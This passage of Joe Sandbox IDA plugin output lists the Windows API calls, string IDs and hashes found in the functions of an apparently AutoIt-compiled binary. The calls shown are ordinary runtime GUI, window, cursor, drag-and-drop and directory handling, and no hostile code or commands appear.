                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00398BEE
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00398C1F
                                                                          • _memset.LIBCMT ref: 00398C44
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00398C8D
                                                                          • _memset.LIBCMT ref: 00398CEC
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00398D16
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00398D6E
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00398E1B
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00398E3D
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00398E87
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00398EB4
                                                                          • DrawMenuBar.USER32(?), ref: 00398EC3
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00398EEB
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          • Opcode ID: 82a386bfddce65f230ac35fe2c85ddb863623b1dde95523f3a924ba2031d6704
                                                                          • Instruction ID: e25b8f4b1c9b2d9dd71e64d01adcd5fcd935cc58dd4aa13e13761ec9f1808a64
                                                                          • Opcode Fuzzy Hash: 82a386bfddce65f230ac35fe2c85ddb863623b1dde95523f3a924ba2031d6704
                                                                          • Instruction Fuzzy Hash: 3AE18071900208AFDF229F64DC84EEE7BBDEF4A710F118156F915AA290DB759A80DF60
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 003949CA
                                                                          • GetDesktopWindow.USER32 ref: 003949DF
                                                                          • GetWindowRect.USER32(00000000), ref: 003949E6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00394A48
                                                                          • DestroyWindow.USER32(?), ref: 00394A74
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00394A9D
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00394ABB
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00394AE1
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00394AF6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00394B09
                                                                          • IsWindowVisible.USER32(?), ref: 00394B29
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00394B44
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00394B58
                                                                          • GetWindowRect.USER32(?,?), ref: 00394B70
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00394B96
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00394BB0
                                                                          • CopyRect.USER32(?,?), ref: 00394BC7
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00394C32
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: bb3949e0dc2dd98c76f133b6471d9485d00288524b2591aa559df275aaaff3a3
                                                                          • Instruction ID: c9063ba0fccb8a59c99f3e8a04b7c34272d2a1cde4fc72046be1f3c1068cf88a
                                                                          • Opcode Fuzzy Hash: bb3949e0dc2dd98c76f133b6471d9485d00288524b2591aa559df275aaaff3a3
                                                                          • Instruction Fuzzy Hash: 0BB17A71608340AFDB05DF65C844F6ABBE8BF88310F008A1DF9999B2A1D771EC46CB95
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003128BC
                                                                          • GetSystemMetrics.USER32(00000007), ref: 003128C4
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003128EF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 003128F7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0031291C
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00312939
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312949
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0031297C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00312990
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003129AE
                                                                          • GetStockObject.GDI32(00000011), ref: 003129CA
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003129D5
                                                                            • Part of subcall function 00312344: GetCursorPos.USER32(?), ref: 00312357
                                                                            • Part of subcall function 00312344: ScreenToClient.USER32(003D57B0,?), ref: 00312374
                                                                            • Part of subcall function 00312344: GetAsyncKeyState.USER32(00000001), ref: 00312399
                                                                            • Part of subcall function 00312344: GetAsyncKeyState.USER32(00000002), ref: 003123A7
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00311256), ref: 003129FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          • Opcode ID: d366fef69a4a6cb74a627dc12b667b52e62f644f19966ce6559acde9f13506f8
                                                                          • Instruction ID: 77f83916bcbcf14d2181d83a8156c0fc46ce55007da935440966affc4668a09f
                                                                          • Opcode Fuzzy Hash: d366fef69a4a6cb74a627dc12b667b52e62f644f19966ce6559acde9f13506f8
                                                                          • Instruction Fuzzy Hash: C3B12D7160120ADFDB16DFA8DC45BEE7BB9FB08311F11412AFA15EB290DB74A851CB50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                          • String ID: {n3${n3
                                                                          • API String ID: 884005220-2485546804
                                                                          • Opcode ID: a265f998ea131342b5c749ca41cd46c03aeac96f4c103666b2c8dd3e6a689074
                                                                          • Instruction ID: 1f52677e7f818d8e3fbb12664b26554e95e580ed77412f73078670b2cc596555
                                                                          • Opcode Fuzzy Hash: a265f998ea131342b5c749ca41cd46c03aeac96f4c103666b2c8dd3e6a689074
                                                                          • Instruction Fuzzy Hash: 4661F372985B16AFDB13AF24D94176A77E8EF01321F224116F801AF191EB34AD41CB93
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0036A47A
                                                                          • __swprintf.LIBCMT ref: 0036A51B
                                                                          • _wcscmp.LIBCMT ref: 0036A52E
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0036A583
                                                                          • _wcscmp.LIBCMT ref: 0036A5BF
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0036A5F6
                                                                          • GetDlgCtrlID.USER32(?), ref: 0036A648
                                                                          • GetWindowRect.USER32(?,?), ref: 0036A67E
                                                                          • GetParent.USER32(?), ref: 0036A69C
                                                                          • ScreenToClient.USER32(00000000), ref: 0036A6A3
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0036A71D
                                                                          • _wcscmp.LIBCMT ref: 0036A731
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0036A757
                                                                          • _wcscmp.LIBCMT ref: 0036A76B
                                                                            • Part of subcall function 0033362C: _iswctype.LIBCMT ref: 00333634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: 74212d912e377c50d73eed659734a844077cc5b20745c45e02a17d1e3c23f866
                                                                          • Instruction ID: 72c8e72c0c3999cc4e15381dee482bd297075137118f8c941762ea21dbffa7fd
                                                                          • Opcode Fuzzy Hash: 74212d912e377c50d73eed659734a844077cc5b20745c45e02a17d1e3c23f866
                                                                          • Instruction Fuzzy Hash: B2A1E031204B06AFD716DF64C884BAAB7E8FF44351F00C629F99AE6194DB30E955CF92
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0036AF18
                                                                          • _wcscmp.LIBCMT ref: 0036AF29
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0036AF51
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0036AF6E
                                                                          • _wcscmp.LIBCMT ref: 0036AF8C
                                                                          • _wcsstr.LIBCMT ref: 0036AF9D
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0036AFD5
                                                                          • _wcscmp.LIBCMT ref: 0036AFE5
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0036B00C
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0036B055
                                                                          • _wcscmp.LIBCMT ref: 0036B065
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0036B08D
                                                                          • GetWindowRect.USER32(00000004,?), ref: 0036B0F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: a891e9ebbcd90ad7eceb9bc180ca89269607eaabf927188e69594325ace92e63
                                                                          • Instruction ID: 749e3b0413340fde1edde1f2e86a71541138bad31b4c634035eda048ca7ece69
                                                                          • Opcode Fuzzy Hash: a891e9ebbcd90ad7eceb9bc180ca89269607eaabf927188e69594325ace92e63
                                                                          • Instruction Fuzzy Hash: E9819E71108205AFDB06DF14C885BAABBE8EF45354F04C46AFD85DA09ADB34DD85CFA2
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0039C627
                                                                            • Part of subcall function 0039AB37: ClientToScreen.USER32(?,?), ref: 0039AB60
                                                                            • Part of subcall function 0039AB37: GetWindowRect.USER32(?,?), ref: 0039ABD6
                                                                            • Part of subcall function 0039AB37: PtInRect.USER32(?,?,0039C014), ref: 0039ABE6
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0039C690
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0039C69B
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0039C6BE
                                                                          • _wcscat.LIBCMT ref: 0039C6EE
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0039C705
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0039C71E
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0039C735
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0039C757
                                                                          • DragFinish.SHELL32(?), ref: 0039C75E
                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0039C851
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb=
                                                                          • API String ID: 169749273-3242401288
                                                                          • Opcode ID: 1a80e39e2e4b636b29d65d912eff47aad262b190c8a7657944ad8657d98c4cc8
                                                                          • Instruction ID: 3ab279cfd41918ff23cc3350265a5aaab3e157d431f026c4b669eb64fa965f69
                                                                          • Opcode Fuzzy Hash: 1a80e39e2e4b636b29d65d912eff47aad262b190c8a7657944ad8657d98c4cc8
                                                                          • Instruction Fuzzy Hash: EB615D71108301AFCB06EF64DC85EAFBBF8EF89710F10092EF595961A1DB719A49CB52
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
                                                                          • Opcode ID: 2ca75ac97cbf27c3b5bd05bc4619f62f87fe5dbeb6572b299de2513d081d7a4c
                                                                          • Instruction ID: b9126bade5ba1227c18d2461ce7153684d768c4c85951fa0a6f2aeeacabe7d5b
                                                                          • Opcode Fuzzy Hash: 2ca75ac97cbf27c3b5bd05bc4619f62f87fe5dbeb6572b299de2513d081d7a4c
                                                                          • Instruction Fuzzy Hash: 4731B035948609AACB1BEB50DD43FEE77B8AB14750F204028F802F91D5EF516F048E52
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00385013
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0038501E
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00385029
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00385034
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0038503F
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0038504A
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00385055
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00385060
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0038506B
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00385076
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00385081
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0038508C
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00385097
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 003850A2
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 003850AD
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003850B8
                                                                          • GetCursorInfo.USER32(?), ref: 003850C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$Info
                                                                          • String ID:
                                                                          • API String ID: 2577412497-0
                                                                          • Opcode ID: 5c5ac80421ae372737e18d28f45b30a8223590094b5e28b424d717dfa7a3c719
                                                                          • Instruction ID: 24cded75b5fd913dae5db1d67b67beffbcbc0c301b4856282c597b14903f6828
                                                                          • Opcode Fuzzy Hash: 5c5ac80421ae372737e18d28f45b30a8223590094b5e28b424d717dfa7a3c719
                                                                          • Instruction Fuzzy Hash: 743103B1D4831D6ADF119FB68C899AFBFE8FF04750F50456AA50DE7280DA78A5008F91
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039A259
                                                                          • DestroyWindow.USER32(?,?), ref: 0039A2D3
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0039A34D
                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0039A36F
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A382
                                                                          • DestroyWindow.USER32(00000000), ref: 0039A3A4
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00310000,00000000), ref: 0039A3DB
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039A3F4
                                                                          • GetDesktopWindow.USER32 ref: 0039A40D
                                                                          • GetWindowRect.USER32(00000000), ref: 0039A414
                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039A42C
                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0039A444
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                          • String ID: 0$tooltips_class32
                                                                          • API String ID: 1297703922-3619404913
                                                                          • Opcode ID: 8729a39dfeee6941b66c816d06b5b40e8b8591b3f7ac94b255ebce3404135b76
                                                                          • Instruction ID: 18b855b39b10bf9262babe8f9519952bf3cf4bd870cbeced63197528ed909e46
                                                                          • Opcode Fuzzy Hash: 8729a39dfeee6941b66c816d06b5b40e8b8591b3f7ac94b255ebce3404135b76
                                                                          • Instruction Fuzzy Hash: 2671AF75140705AFDB26CF28CC49FA677E9FB89300F05461DF9858B2A0D771E942DB92
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00394424
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0039446F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: cb47004aedca5354eef2bc6bbc0a82b20b5a3692a41424a8d812c7799c1725d4
                                                                          • Instruction ID: 5633ad1916a4e73a46756bd97439bec3a340137482378d2828ac61359d6f6b09
                                                                          • Opcode Fuzzy Hash: cb47004aedca5354eef2bc6bbc0a82b20b5a3692a41424a8d812c7799c1725d4
                                                                          • Instruction Fuzzy Hash: 74915E752043019FCB0AEF10C461BAEB7E5AF99354F05846DF8965B7A2CB31ED4ACB81
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0039B8B4
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00396B11,?), ref: 0039B910
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039B949
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0039B98C
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0039B9C3
                                                                          • FreeLibrary.KERNEL32(?), ref: 0039B9CF
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039B9DF
                                                                          • DestroyIcon.USER32(?), ref: 0039B9EE
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0039BA0B
                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0039BA17
                                                                            • Part of subcall function 00332EFD: __wcsicmp_l.LIBCMT ref: 00332F86
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 1212759294-1154884017
                                                                          • Opcode ID: 7b4b50bf3428674c85c387a2849d1dfd8ab55482cabfedae95f1cf7b837f739f
                                                                          • Instruction ID: 60981bce6e2c985fcd06b2c7b041775ca67c036108e63a5ea5bf1d93f8e495f6
                                                                          • Opcode Fuzzy Hash: 7b4b50bf3428674c85c387a2849d1dfd8ab55482cabfedae95f1cf7b837f739f
                                                                          • Instruction Fuzzy Hash: 0C61D071900219BEEF16DF64DD85FBEB7ACEB08710F10421AF915DA1C0DB75A990D7A0
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 0037DCDC
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0037DCEC
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037DCF8
                                                                          • __wsplitpath.LIBCMT ref: 0037DD56
                                                                          • _wcscat.LIBCMT ref: 0037DD6E
                                                                          • _wcscat.LIBCMT ref: 0037DD80
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037DD95
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDA9
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDDB
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0037DDFC
                                                                          • _wcscpy.LIBCMT ref: 0037DE08
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037DE47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 3566783562-438819550
                                                                          • Opcode ID: 895e2cddbb3f42b0d05c5dc2fa1945b4c789f3c1e994ea9779383fca08ffb0ee
                                                                          • Instruction ID: 016a85f69526c86357ec1b979ba842b6d3eb0e629a7272c87abe62bd3a06119f
                                                                          • Opcode Fuzzy Hash: 895e2cddbb3f42b0d05c5dc2fa1945b4c789f3c1e994ea9779383fca08ffb0ee
                                                                          • Instruction Fuzzy Hash: A3617F765042059FCB22EF20C854A9EB3F8FF89310F04891EF999CB251DB75E945CB51
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00379C7F
